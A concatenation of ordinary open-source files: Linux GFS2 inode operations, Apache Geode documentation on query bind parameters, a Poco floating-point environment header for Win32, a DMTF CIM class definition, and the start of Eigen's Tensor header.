        umode_t old_mode = oip->i_inode.i_mode;
        umode_t new_mode = nip->i_inode.i_mode;
        int error;

        error = gfs2_rindex_update(sdp);
        if (error)
                return error;

        if (odip != ndip) {
                /* Cross-directory exchange: serialize against all other
                   renames on this filesystem */
                error = gfs2_glock_nq_init(sdp->sd_rename_gl, LM_ST_EXCLUSIVE,
                                           0, &r_gh);
                if (error)
                        goto out;

                if (S_ISDIR(old_mode)) {
                        /* don't move a directory into its subdir */
                        error = gfs2_ok_to_move(oip, ndip);
                        if (error)
                                goto out_gunlock_r;
                }

                if (S_ISDIR(new_mode)) {
                        /* don't move a directory into its subdir */
                        error = gfs2_ok_to_move(nip, odip);
                        if (error)
                                goto out_gunlock_r;
                }
        }

        num_gh = 1;
        gfs2_holder_init(odip->i_gl, LM_ST_EXCLUSIVE, 0, ghs);
        if (odip != ndip) {
                gfs2_holder_init(ndip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
                num_gh++;
        }
        gfs2_holder_init(oip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
        num_gh++;

        gfs2_holder_init(nip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
        num_gh++;

        for (x = 0; x < num_gh; x++) {
                error = gfs2_glock_nq(ghs + x);
                if (error)
                        goto out_gunlock;
        }

        error = -ENOENT;
        if (oip->i_inode.i_nlink == 0 || nip->i_inode.i_nlink == 0)
                goto out_gunlock;

        /* Both entries must be removable from their current parents */
        error = gfs2_unlink_ok(odip, &odentry->d_name, oip);
        if (error)
                goto out_gunlock;
        error = gfs2_unlink_ok(ndip, &ndentry->d_name, nip);
        if (error)
                goto out_gunlock;

        if (S_ISDIR(old_mode)) {
                error = gfs2_permission(odentry->d_inode, MAY_WRITE);
                if (error)
                        goto out_gunlock;
        }
        if (S_ISDIR(new_mode)) {
                error = gfs2_permission(ndentry->d_inode, MAY_WRITE);
                if (error)
                        goto out_gunlock;
        }
        error = gfs2_trans_begin(sdp, 4 * RES_DINODE + 4 * RES_LEAF, 0);
        if (error)
                goto out_gunlock;

        /* Fix up ".." (or ctime) on both inodes being swapped */
        error = update_moved_ino(oip, ndip, S_ISDIR(old_mode));
        if (error)
                goto out_end_trans;

        error = update_moved_ino(nip, odip, S_ISDIR(new_mode));
        if (error)
                goto out_end_trans;

        /* Re-point each parent's entry at the other inode */
        error = gfs2_dir_mvino(ndip, &ndentry->d_name, oip,
                               IF2DT(old_mode));
        if (error)
                goto out_end_trans;

        error = gfs2_dir_mvino(odip, &odentry->d_name, nip,
                               IF2DT(new_mode));
        if (error)
                goto out_end_trans;

        /* A dir/non-dir swap across directories shifts one ".."
           back-link between the two parents */
        if (odip != ndip) {
                if (S_ISDIR(new_mode) && !S_ISDIR(old_mode)) {
                        inc_nlink(&odip->i_inode);
                        drop_nlink(&ndip->i_inode);
                } else if (S_ISDIR(old_mode) && !S_ISDIR(new_mode)) {
                        inc_nlink(&ndip->i_inode);
                        drop_nlink(&odip->i_inode);
                }
        }
        mark_inode_dirty(&ndip->i_inode);
        if (odip != ndip)
                mark_inode_dirty(&odip->i_inode);

out_end_trans:
        gfs2_trans_end(sdp);
out_gunlock:
        /* Holders 0..x-1 were queued; drop and uninit them in reverse */
        while (x--) {
                gfs2_glock_dq(ghs + x);
                gfs2_holder_uninit(ghs + x);
        }
out_gunlock_r:
        if (r_gh.gh_gl)
                gfs2_glock_dq_uninit(&r_gh);
out:
        return error;
}
/**
 * gfs2_rename2 - rename entry point supporting rename flags
 * @odir: Parent directory of the old name
 * @odentry: The old dentry
 * @ndir: Parent directory of the new name
 * @ndentry: The new dentry
 * @flags: RENAME_* flags from the VFS
 *
 * RENAME_NOREPLACE is handled implicitly by the lookup path, so it is
 * masked off here; of the remainder only RENAME_EXCHANGE is supported.
 *
 * Returns: errno
 */
static int gfs2_rename2(struct inode *odir, struct dentry *odentry,
                        struct inode *ndir, struct dentry *ndentry,
                        unsigned int flags)
{
        unsigned int rest = flags & ~RENAME_NOREPLACE;

        if (rest & ~RENAME_EXCHANGE)
                return -EINVAL;

        if (rest & RENAME_EXCHANGE)
                return gfs2_exchange(odir, odentry, ndir, ndentry, rest);

        return gfs2_rename(odir, odentry, ndir, ndentry);
}
/**
 * gfs2_follow_link - Follow a symbolic link
 * @dentry: The dentry of the link
 * @cookie: Set to the returned buffer so put_link can free it
 *
 * Reads the link target out of the (stuffed) dinode under a shared
 * glock. This can handle symlinks of any size.
 *
 * Returns: the link target string, or an ERR_PTR on failure
 */
static const char *gfs2_follow_link(struct dentry *dentry, void **cookie)
{
        struct gfs2_inode *ip = GFS2_I(d_inode(dentry));
        struct gfs2_holder i_gh;
        struct buffer_head *dibh;
        unsigned int size;
        char *buf;
        int error;

        gfs2_holder_init(ip->i_gl, LM_ST_SHARED, 0, &i_gh);
        error = gfs2_glock_nq(&i_gh);
        if (error) {
                gfs2_holder_uninit(&i_gh);
                return ERR_PTR(error);
        }

        size = (unsigned int)i_size_read(&ip->i_inode);
        /* A zero-length symlink is on-disk corruption */
        if (size == 0) {
                gfs2_consist_inode(ip);
                buf = ERR_PTR(-EIO);
                goto out;
        }

        error = gfs2_meta_inode_buffer(ip, &dibh);
        if (error) {
                buf = ERR_PTR(error);
                goto out;
        }

        /* +1 for the terminating NUL (kzalloc zeroes it) */
        buf = kzalloc(size + 1, GFP_NOFS);
        if (!buf)
                buf = ERR_PTR(-ENOMEM);
        else
                /* Target text lives right after the dinode header */
                memcpy(buf, dibh->b_data + sizeof(struct gfs2_dinode), size);
        brelse(dibh);
out:
        gfs2_glock_dq_uninit(&i_gh);
        if (!IS_ERR(buf))
                *cookie = buf;
        return buf;
}
/**
 * gfs2_permission - Check access permission on an inode
 * @inode: The inode
 * @mask: The mask to be tested (MAY_* flags)
 *
 * This may be called from the VFS directly, or from within GFS2 with the
 * inode locked, so we look to see if the glock is already locked and only
 * lock the glock if its not already been done.
 *
 * Returns: errno
 */
int gfs2_permission(struct inode *inode, int mask)
{
        struct gfs2_inode *ip;
        struct gfs2_holder i_gh;
        int error;
        int unlock = 0;

        ip = GFS2_I(inode);
        if (gfs2_glock_is_locked_by_me(ip->i_gl) == NULL) {
                /* RCU path walk must not block on a glock acquisition */
                if (mask & MAY_NOT_BLOCK)
                        return -ECHILD;
                error = gfs2_glock_nq_init(ip->i_gl, LM_ST_SHARED, LM_FLAG_ANY, &i_gh);
                if (error)
                        return error;
                unlock = 1;
        }

        /* Immutable files reject writes regardless of mode bits */
        if ((mask & MAY_WRITE) && IS_IMMUTABLE(inode))
                error = -EACCES;
        else
                error = generic_permission(inode, mask);
        if (unlock)
                gfs2_glock_dq_uninit(&i_gh);

        return error;
}
/*
 * __gfs2_setattr_simple - copy attribute changes into the inode
 *
 * No quota or transaction handling; the caller must already be inside
 * a transaction (or know one is not required).
 */
static int __gfs2_setattr_simple(struct inode *inode, struct iattr *attr)
{
        setattr_copy(inode, attr);
        mark_inode_dirty(inode);
        return 0;
}
/**
 * gfs2_setattr_simple - apply simple attribute changes under a transaction
 * @inode: The inode being changed
 * @attr: The attributes to apply
 *
 * If the caller is already inside a transaction, the change is applied
 * directly; otherwise a one-dinode transaction is opened around it.
 *
 * Returns: errno
 */
int gfs2_setattr_simple(struct inode *inode, struct iattr *attr)
{
        struct gfs2_sbd *sdp = GFS2_SB(inode);
        int ret;

        /* Already inside a transaction? Just apply the change. */
        if (current->journal_info)
                return __gfs2_setattr_simple(inode, attr);

        ret = gfs2_trans_begin(sdp, RES_DINODE, 0);
        if (ret == 0) {
                ret = __gfs2_setattr_simple(inode, attr);
                gfs2_trans_end(sdp);
        }
        return ret;
}
/*
 * setattr_chown - change the owner and/or group of an inode
 * @inode: The inode
 * @attr: The new attributes (ATTR_UID and/or ATTR_GID may be set)
 *
 * Moves the inode's block allocation between the old and new uid/gid
 * quota accounts inside a single transaction.
 *
 * Returns: errno
 */
static int setattr_chown(struct inode *inode, struct iattr *attr)
{
        struct gfs2_inode *ip = GFS2_I(inode);
        struct gfs2_sbd *sdp = GFS2_SB(inode);
        kuid_t ouid, nuid;
        kgid_t ogid, ngid;
        int error;
        struct gfs2_alloc_parms ap;

        ouid = inode->i_uid;
        ogid = inode->i_gid;
        nuid = attr->ia_uid;
        ngid = attr->ia_gid;

        /* An unchanged id means no quota transfer for that dimension */
        if (!(attr->ia_valid & ATTR_UID) || uid_eq(ouid, nuid))
                ouid = nuid = NO_UID_QUOTA_CHANGE;
        if (!(attr->ia_valid & ATTR_GID) || gid_eq(ogid, ngid))
                ogid = ngid = NO_GID_QUOTA_CHANGE;
        error = get_write_access(inode);
        if (error)
                return error;

        error = gfs2_rs_alloc(ip);
        if (error)
                goto out;

        error = gfs2_rindex_update(sdp);
        if (error)
                goto out;

        error = gfs2_quota_lock(ip, nuid, ngid);
        if (error)
                goto out;

        /* The number of blocks that will move between quota accounts */
        ap.target = gfs2_get_inode_blocks(&ip->i_inode);

        if (!uid_eq(ouid, NO_UID_QUOTA_CHANGE) ||
            !gid_eq(ogid, NO_GID_QUOTA_CHANGE)) {
                error = gfs2_quota_check(ip, nuid, ngid, &ap);
                if (error)
                        goto out_gunlock_q;
        }

        error = gfs2_trans_begin(sdp, RES_DINODE + 2 * RES_QUOTA, 0);
        if (error)
                goto out_gunlock_q;

        error = gfs2_setattr_simple(inode, attr);
        if (error)
                goto out_end_trans;

        /* Debit the old owner, credit the new one */
        if (!uid_eq(ouid, NO_UID_QUOTA_CHANGE) ||
            !gid_eq(ogid, NO_GID_QUOTA_CHANGE)) {
                gfs2_quota_change(ip, -(s64)ap.target, ouid, ogid);
                gfs2_quota_change(ip, ap.target, nuid, ngid);
        }

out_end_trans:
        gfs2_trans_end(sdp);
out_gunlock_q:
        gfs2_quota_unlock(ip);
out:
        put_write_access(inode);
        return error;
}
/**
 * gfs2_setattr - Change attributes on an inode
 * @dentry: The dentry which is changing
 * @attr: The structure describing the change
 *
 * The VFS layer wants to change one or more of an inodes attributes. Write
 * that change out to disk. Size, ownership, and other changes each take
 * their own specialized path.
 *
 * Returns: errno
 */
static int gfs2_setattr(struct dentry *dentry, struct iattr *attr)
{
        struct inode *inode = d_inode(dentry);
        struct gfs2_inode *ip = GFS2_I(inode);
        struct gfs2_holder i_gh;
        int error;

        error = gfs2_rs_alloc(ip);
        if (error)
                return error;

        error = gfs2_glock_nq_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, &i_gh);
        if (error)
                return error;

        error = -EPERM;
        if (IS_IMMUTABLE(inode) || IS_APPEND(inode))
                goto out;

        error = inode_change_ok(inode, attr);
        if (error)
                goto out;

        /* Dispatch to the appropriate path: truncate, chown, or simple */
        if (attr->ia_valid & ATTR_SIZE)
                error = gfs2_setattr_size(inode, attr->ia_size);
        else if (attr->ia_valid & (ATTR_UID | ATTR_GID))
                error = setattr_chown(inode, attr);
        else {
                error = gfs2_setattr_simple(inode, attr);
                /* A mode change may require rewriting the ACL too */
                if (!error && attr->ia_valid & ATTR_MODE)
                        error = posix_acl_chmod(inode, inode->i_mode);
        }

out:
        if (!error)
                mark_inode_dirty(inode);
        gfs2_glock_dq_uninit(&i_gh);
        return error;
}
/**
 * gfs2_getattr - Read out an inode's attributes
 * @mnt: The vfsmount the inode is being accessed from
 * @dentry: The dentry to stat
 * @stat: The inode's stats
 *
 * This may be called from the VFS directly, or from within GFS2 with the
 * inode locked, so we look to see if the glock is already locked and only
 * lock the glock if its not already been done. Note that its the NFS
 * readdirplus operation which causes this to be called (from filldir)
 * with the glock already held.
 *
 * Returns: errno
 */
static int gfs2_getattr(struct vfsmount *mnt, struct dentry *dentry,
                        struct kstat *stat)
{
        struct inode *inode = d_inode(dentry);
        struct gfs2_inode *ip = GFS2_I(inode);
        struct gfs2_holder gh;
        int error;
        int unlock = 0;

        /* Take a shared glock only if the caller doesn't hold one */
        if (gfs2_glock_is_locked_by_me(ip->i_gl) == NULL) {
                error = gfs2_glock_nq_init(ip->i_gl, LM_ST_SHARED, LM_FLAG_ANY, &gh);
                if (error)
                        return error;
                unlock = 1;
        }

        generic_fillattr(inode, stat);
        if (unlock)
                gfs2_glock_dq_uninit(&gh);

        return 0;
}
/*
 * gfs2_setxattr - set an extended attribute under an exclusive glock
 *
 * Takes the inode glock exclusively, makes sure a block reservation
 * structure exists, then defers to the generic xattr code.
 *
 * Returns: errno
 */
static int gfs2_setxattr(struct dentry *dentry, const char *name,
                         const void *data, size_t size, int flags)
{
        struct inode *inode = d_inode(dentry);
        struct gfs2_inode *ip = GFS2_I(inode);
        struct gfs2_holder gh;
        int ret;

        gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, &gh);
        ret = gfs2_glock_nq(&gh);
        if (ret) {
                gfs2_holder_uninit(&gh);
                return ret;
        }

        ret = gfs2_rs_alloc(ip);
        if (!ret)
                ret = generic_setxattr(dentry, name, data, size, flags);

        gfs2_glock_dq(&gh);
        gfs2_holder_uninit(&gh);
        return ret;
}
/*
 * gfs2_getxattr - read an extended attribute under a shared glock
 *
 * If the caller already holds the inode glock (selinux during lookup),
 * the generic handler is invoked directly without re-locking.
 *
 * Returns: attribute size on success, or -errno
 */
static ssize_t gfs2_getxattr(struct dentry *dentry, const char *name,
                             void *data, size_t size)
{
        struct inode *inode = d_inode(dentry);
        struct gfs2_inode *ip = GFS2_I(inode);
        struct gfs2_holder gh;
        int ret;

        /* For selinux during lookup */
        if (gfs2_glock_is_locked_by_me(ip->i_gl))
                return generic_getxattr(dentry, name, data, size);

        gfs2_holder_init(ip->i_gl, LM_ST_SHARED, LM_FLAG_ANY, &gh);
        ret = gfs2_glock_nq(&gh);
        if (ret) {
                gfs2_holder_uninit(&gh);
                return ret;
        }

        ret = generic_getxattr(dentry, name, data, size);
        gfs2_glock_dq(&gh);
        gfs2_holder_uninit(&gh);
        return ret;
}
/*
 * gfs2_removexattr - remove an extended attribute under an exclusive glock
 *
 * Mirrors gfs2_setxattr: exclusive glock, ensure a reservation exists,
 * then defer to the generic handler.
 *
 * Returns: errno
 */
static int gfs2_removexattr(struct dentry *dentry, const char *name)
{
        struct inode *inode = d_inode(dentry);
        struct gfs2_inode *ip = GFS2_I(inode);
        struct gfs2_holder gh;
        int ret;

        gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, &gh);
        ret = gfs2_glock_nq(&gh);
        if (ret) {
                gfs2_holder_uninit(&gh);
                return ret;
        }

        ret = gfs2_rs_alloc(ip);
        if (!ret)
                ret = generic_removexattr(dentry, name);

        gfs2_glock_dq(&gh);
        gfs2_holder_uninit(&gh);
        return ret;
}
/*
 * gfs2_fiemap - report the extent mapping of a file
 * @inode: The inode
 * @fieinfo: Destination for extent records
 * @start: Byte offset to start mapping from
 * @len: Number of bytes to map
 *
 * Stuffed (inline) files are reported as a single inline extent located
 * inside the dinode block; all others go through the generic block
 * mapper. Runs under i_mutex and a shared glock.
 *
 * Returns: errno
 */
static int gfs2_fiemap(struct inode *inode, struct fiemap_extent_info *fieinfo,
                       u64 start, u64 len)
{
        struct gfs2_inode *ip = GFS2_I(inode);
        struct gfs2_holder gh;
        int ret;

        ret = fiemap_check_flags(fieinfo, FIEMAP_FLAG_SYNC);
        if (ret)
                return ret;

        mutex_lock(&inode->i_mutex);

        ret = gfs2_glock_nq_init(ip->i_gl, LM_ST_SHARED, 0, &gh);
        if (ret)
                goto out;

        if (gfs2_is_stuffed(ip)) {
                /* Inline data lives just past the dinode header in the
                   dinode's own disk block */
                u64 phys = ip->i_no_addr << inode->i_blkbits;
                u64 size = i_size_read(inode);
                u32 flags = FIEMAP_EXTENT_LAST|FIEMAP_EXTENT_NOT_ALIGNED|
                            FIEMAP_EXTENT_DATA_INLINE;
                phys += sizeof(struct gfs2_dinode);
                phys += start;
                /* NOTE(review): if start >= size, len underflows here, but
                   it is never used since the fill below is skipped */
                if (start + len > size)
                        len = size - start;
                if (start < size)
                        ret = fiemap_fill_next_extent(fieinfo, start, phys,
                                                      len, flags);
                /* fill_next_extent returns 1 when the caller's buffer is
                   full, which is not an error */
                if (ret == 1)
                        ret = 0;
        } else {
                ret = __generic_block_fiemap(inode, fieinfo, start, len,
                                             gfs2_block_map);
        }

        gfs2_glock_dq_uninit(&gh);
out:
        mutex_unlock(&inode->i_mutex);
        return ret;
}
/* Inode operations for regular files */
const struct inode_operations gfs2_file_iops = {
        .permission = gfs2_permission,
        .setattr = gfs2_setattr,
        .getattr = gfs2_getattr,
        .setxattr = gfs2_setxattr,
        .getxattr = gfs2_getxattr,
        .listxattr = gfs2_listxattr,
        .removexattr = gfs2_removexattr,
        .fiemap = gfs2_fiemap,
        .get_acl = gfs2_get_acl,
        .set_acl = gfs2_set_acl,
};
/* Inode operations for directories; note that rmdir is handled by
   gfs2_unlink, which dispatches on the inode type */
const struct inode_operations gfs2_dir_iops = {
        .create = gfs2_create,
        .lookup = gfs2_lookup,
        .link = gfs2_link,
        .unlink = gfs2_unlink,
        .symlink = gfs2_symlink,
        .mkdir = gfs2_mkdir,
        .rmdir = gfs2_unlink,
        .mknod = gfs2_mknod,
        .rename2 = gfs2_rename2,
        .permission = gfs2_permission,
        .setattr = gfs2_setattr,
        .getattr = gfs2_getattr,
        .setxattr = gfs2_setxattr,
        .getxattr = gfs2_getxattr,
        .listxattr = gfs2_listxattr,
        .removexattr = gfs2_removexattr,
        .fiemap = gfs2_fiemap,
        .get_acl = gfs2_get_acl,
        .set_acl = gfs2_set_acl,
        .atomic_open = gfs2_atomic_open,
};
/* Inode operations for symbolic links */
const struct inode_operations gfs2_symlink_iops = {
        .readlink = generic_readlink,
        .follow_link = gfs2_follow_link,
        .put_link = kfree_put_link,
        .permission = gfs2_permission,
        .setattr = gfs2_setattr,
        .getattr = gfs2_getattr,
        .setxattr = gfs2_setxattr,
        .getxattr = gfs2_getxattr,
        .listxattr = gfs2_listxattr,
        .removexattr = gfs2_removexattr,
        .fiemap = gfs2_fiemap,
};
| {
"pile_set_name": "Github"
} |
---
title: Using Query Bind Parameters
---
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
Using query bind parameters in <%=vars.product_name%> queries is similar to using prepared statements in SQL where parameters can be set during query execution. This allows the user to build a query once and execute it multiple times by passing the query conditions during run time.
Query objects are thread-safe.
The use of query bind parameters is now supported in Client-to-Server queries.
The query parameters are identified by a dollar sign, $, followed by a digit that represents the parameter's position in the parameter array passed to the execute method. Counting begins at 1, so $1 references the first bound attribute, $2 the second attribute, and so on.
The Query interface provides an overloaded execute method that accepts parameters inside an Object array. See the [Query.execute](/releases/latest/javadoc/org/apache/geode/cache/query/Query.html) JavaDocs for more details.
The 0th element of the Object array is used for the first query parameter, and so on. If the parameter count or parameter types do not match the query specification, the execute method throws an exception. Specifically, if you pass in the wrong number of parameters, the method call throws a `QueryParameterCountInvalidException`. If a parameter object type is not compatible with what is expected, the method call throws a `TypeMismatchException`.
In the following example, the first parameter, the integer **2**, is bound to the first element in the object array. The second parameter, **active**, is bound to the second element.
## <a id="concept_173E775FE46B47DF9D7D1E40680D34DF__section_7F5A800E2DA643F2B30162EF45DBA390" class="no-quick-link"></a>Sample Code
``` pre
// specify the query string
String queryString = "SELECT DISTINCT * FROM /exampleRegion p WHERE p.id = $1 and p.status = $2";
QueryService queryService = cache.getQueryService();
Query query = queryService.newQuery(queryString);
// set query bind parameters
Object[] params = new Object[2];
params[0] = 2;
params[1] = "active";
// Execute the query locally. It returns the results set.
SelectResults results = (SelectResults) query.execute(params);
// use the results of the query; this example only looks at the size
int size = results.size();
```
## <a id="concept_173E775FE46B47DF9D7D1E40680D34DF__section_90B4A0010CDA481581B650AE6D9EBA34" class="no-quick-link"></a>Using Query Bind Parameters in the Path Expression
Additionally the query engine supports the use of query bind parameter in place of a region path. When you specify a bind parameter in the query's FROM clause, the parameter's referenced value must be bound to a collection.
**Examples:**
The following query can be used on any collection by passing in the collection as a query parameter value. In this query you could pass in a Region object for $1, but not the String name of a region.
``` pre
SELECT DISTINCT * FROM $1 p WHERE p.status = $2
```
Get all the keys from the region passed as a Region object for $1 for those entries whose name attribute is equal to the value passed for $2:
``` pre
SELECT e.key FROM ($1).entrySet e WHERE e.value.name=$2
```
| {
"pile_set_name": "Github"
} |
//
// FPEnvironment_WIN32.h
//
// Library: Foundation
// Package: Core
// Module: FPEnvironment
//
// Definitions of class FPEnvironmentImpl for WIN32.
//
// Copyright (c) 2004-2006, Applied Informatics Software Engineering GmbH.
// and Contributors.
//
// SPDX-License-Identifier: BSL-1.0
//
#ifndef Foundation_FPEnvironment_WIN32_INCLUDED
#define Foundation_FPEnvironment_WIN32_INCLUDED
#include "Poco/Foundation.h"
#include <float.h>
#include <math.h>
// Fallback definitions for the MSVC floating-point status-word bits, so
// this header also compiles with toolchains whose <float.h> does not
// provide them. Values match the Microsoft CRT.
#ifndef _SW_INEXACT
#	define _SW_INEXACT 0x00000001 // inexact (precision)
#endif
#ifndef _SW_UNDERFLOW
#	define _SW_UNDERFLOW 0x00000002 // underflow
#endif
#ifndef _SW_OVERFLOW
#	define _SW_OVERFLOW 0x00000004 // overflow
#endif
#ifndef _SW_ZERODIVIDE
#	define _SW_ZERODIVIDE 0x00000008 // zero divide
#endif
#ifndef _SW_INVALID
#	define _SW_INVALID 0x00000010 // invalid
#endif
#ifndef _SW_DENORMAL
#	define _SW_DENORMAL 0x00080000 // denormal status bit
#endif
namespace Poco {
/// WIN32 implementation backend for Poco::FPEnvironment.
/// Maps the portable rounding-mode and exception-flag enums onto the
/// Microsoft CRT (_RC_* / _SW_*) constants and stores the control word
/// captured by keepCurrentImpl() in _env.
class Foundation_API FPEnvironmentImpl
{
protected:
	enum RoundingModeImpl
		/// Rounding modes, expressed as CRT _RC_* control-word values.
	{
		FP_ROUND_DOWNWARD_IMPL = _RC_DOWN,
		FP_ROUND_UPWARD_IMPL = _RC_UP,
		FP_ROUND_TONEAREST_IMPL = _RC_NEAR,
		FP_ROUND_TOWARDZERO_IMPL = _RC_CHOP
	};
	enum FlagImpl
		/// Exception/status flags, expressed as CRT _SW_* status-word bits.
	{
		FP_DIVIDE_BY_ZERO_IMPL = _SW_ZERODIVIDE,
		FP_INEXACT_IMPL = _SW_INEXACT,
		FP_OVERFLOW_IMPL = _SW_OVERFLOW,
		FP_UNDERFLOW_IMPL = _SW_UNDERFLOW,
		FP_INVALID_IMPL = _SW_INVALID
	};
	FPEnvironmentImpl();
	FPEnvironmentImpl(const FPEnvironmentImpl& env);
	~FPEnvironmentImpl();
	FPEnvironmentImpl& operator = (const FPEnvironmentImpl& env);
	void keepCurrentImpl();
		/// Capture the current FP environment into _env.
	static void clearFlagsImpl();
	static bool isFlagImpl(FlagImpl flag);
	static void setRoundingModeImpl(RoundingModeImpl mode);
	static RoundingModeImpl getRoundingModeImpl();
	static bool isInfiniteImpl(float value);
	static bool isInfiniteImpl(double value);
	static bool isInfiniteImpl(long double value);
	static bool isNaNImpl(float value);
	static bool isNaNImpl(double value);
	static bool isNaNImpl(long double value);
	static float copySignImpl(float target, float source);
	static double copySignImpl(double target, double source);
	static long double copySignImpl(long double target, long double source);
private:
	unsigned _env;
		/// Saved floating-point control word (see keepCurrentImpl()).
};
//
// inlines
//
// NOTE(review): _finite() returns 0 for both infinities AND NaN, so
// these isInfiniteImpl overloads also report true for NaN inputs —
// callers are expected to check isNaN first; confirm before relying
// on isInfinite alone.
inline bool FPEnvironmentImpl::isInfiniteImpl(float value)
{
	return _finite(value) == 0;
}
inline bool FPEnvironmentImpl::isInfiniteImpl(double value)
{
	return _finite(value) == 0;
}
inline bool FPEnvironmentImpl::isInfiniteImpl(long double value)
{
	// On MSVC, long double has the same representation as double.
	return _finite(value) == 0;
}
inline bool FPEnvironmentImpl::isNaNImpl(float value)
{
	return _isnan(value) != 0;
}
inline bool FPEnvironmentImpl::isNaNImpl(double value)
{
	return _isnan(value) != 0;
}
inline bool FPEnvironmentImpl::isNaNImpl(long double value)
{
	return _isnan(value) != 0;
}
// Return a value with the magnitude of target and the sign of source.
inline float FPEnvironmentImpl::copySignImpl(float target, float source)
{
	return float(_copysign(target, source));
}
inline double FPEnvironmentImpl::copySignImpl(double target, double source)
{
	return _copysign(target, source);
}
inline long double FPEnvironmentImpl::copySignImpl(long double target, long double source)
{
	// NOTE(review): unlike the _copysign-based overloads, this hand-rolled
	// version treats source == 0 (either sign) as negative: when neither
	// comparison is true it returns -target. It also ignores the sign of
	// negative zero. Confirm whether callers rely on exact copysign
	// semantics for zero-valued sources.
	return (source > 0 && target > 0) || (source < 0 && target < 0) ? target : -target;
}
} // namespace Poco
#endif // Foundation_FPEnvironment_WIN32_INCLUDED
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2005 DMTF. All rights reserved.
[Version ( "2.8.0" ),
UMLPackagePath ( "CIM::Interop" ),
Description (
    "An ObjectManagerAdapter is a Service of the CIM Object Manager. "
"An adapter can be any service of the Object Manager that needs "
"to be managed (e.g. started, stopped, monitored, ...). There "
"MUST be an instance for each Adapter type." )]
class CIM_ObjectManagerAdapter : CIM_WBEMService {
[Override ( "Name" ),
Description (
"A human-readable name that uniquely identifies the "
"ObjectManager within a system." )]
string Name;
[Override ( "ElementName" ),
Description (
    "The ElementName property is used as a name of the Object "
"Manager Adapter for human interfaces. For example, \"ACME "
"ObjectManager Adapter\"." )]
string ElementName;
[Required, Description (
"An implementation specific string that identifies the "
"handle to the Object Manager Adapter." )]
string Handle;
[Required, Description (
"AdapterType enumerates the kind of Object Manager "
"Adapter. If \'Other\' is specified, the "
"OtherAdapterTypeDescription property MUST be populated. \n"
"Other - If the adapter does not fit into one of the "
    "other categories in the list. If specified, the "
"OtherAdapterTypeDescription property MUST be populated. \n"
"Client - A client side adapter that responds to client "
"operation requests, such as CIM-XML or CIM-SOAP. \n"
"Provider - A provider adapter, such as DMI, SNMP, JSR48 "
"or CMPI. \n"
"Indication Handler - An Indication Handler is a service "
"that delivers indications to a subscriber. Examples of "
"possible Indication Handlers are CIM-XML, CIM-SOAP, SMPT "
"(e-mail) or any other delivery mechanism. \n"
"Repository - A repository is an adapter that can "
"store/retrieve persistent data, such as CIM Qualifier "
"Types, CIM Classes and CIM Instances. An Object Manager "
"could use multiple repositiories at one time, for "
"example one could be used for CIM Schema information "
"only, while another is used for instance information. "
"Repositories MAY be remote or local to the CIM Object "
"Manager. Examples of repository implementations could be "
"databases, LDAP or files." ),
ValueMap { "1", "2", "3", "4", "5" },
Values { "Other", "Client", "Provider", "Indication Handler",
"Repository" },
ModelCorrespondence {
"CIM_ObjectManagerAdapter.OtherAdapterTypeDescription" }]
uint16 AdapterType;
[Description (
"The type(s) of ObjectManagerAdapter when \"Other\" is "
"included in ObjectManagerAdapterType property." ),
ModelCorrespondence { "CIM_ObjectManagerAdapter.AdapterType" }]
string OtherAdapterTypeDescription;
};
| {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2014 Benoit Steiner <[email protected]>
// Copyright (C) 2013 Christian Seiler <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#ifndef EIGEN_CXX11_TENSOR_TENSOR_H
#define EIGEN_CXX11_TENSOR_TENSOR_H
namespace Eigen {
/** \class Tensor
* \ingroup CXX11_Tensor_Module
*
* \brief The tensor class.
*
* The %Tensor class is the work-horse for all \em dense tensors within Eigen.
*
* The %Tensor class encompasses only dynamic-size objects so far.
*
* The first two template parameters are required:
* \tparam Scalar_ Numeric type, e.g. float, double, int or `std::complex<float>`.
* User defined scalar types are supported as well (see \ref user_defined_scalars "here").
* \tparam NumIndices_ Number of indices (i.e. rank of the tensor)
*
* The remaining template parameters are optional -- in most cases you don't have to worry about them.
* \tparam Options_ A combination of either \b #RowMajor or \b #ColMajor, and of either
* \b #AutoAlign or \b #DontAlign.
* The former controls \ref TopicStorageOrders "storage order", and defaults to column-major. The latter controls alignment, which is required
* for vectorization. It defaults to aligning tensors. Note that tensors currently do not support any operations that profit from vectorization.
* Support for such operations (i.e. adding two tensors etc.) is planned.
*
* You can access elements of tensors using normal subscripting:
*
* \code
* Eigen::Tensor<double, 4> t(10, 10, 10, 10);
* t(0, 1, 2, 3) = 42.0;
* \endcode
*
* This class can be extended with the help of the plugin mechanism described on the page
* \ref TopicCustomizing_Plugins by defining the preprocessor symbol \c EIGEN_TENSOR_PLUGIN.
*
* <i><b>Some notes:</b></i>
*
* <dl>
* <dt><b>Relation to other parts of Eigen:</b></dt>
* <dd>The midterm development goal for this class is to have a similar hierarchy as Eigen uses for matrices, so that
* taking blocks or using tensors in expressions is easily possible, including an interface with the vector/matrix code
* by providing .asMatrix() and .asVector() (or similar) methods for rank 2 and 1 tensors. However, currently, the %Tensor
* class does not provide any of these features and is only available as a stand-alone class that just allows for
* coefficient access. Also, when fixed-size tensors are implemented, the number of template arguments is likely to
* change dramatically.</dd>
* </dl>
*
* \ref TopicStorageOrders
*/
template<typename Scalar_, int NumIndices_, int Options_, typename IndexType_>
class Tensor : public TensorBase<Tensor<Scalar_, NumIndices_, Options_, IndexType_> >
{
  public:
    // Convenience aliases; Self/Base keep the long template signatures readable
    // and are also queried by the expression/evaluator machinery.
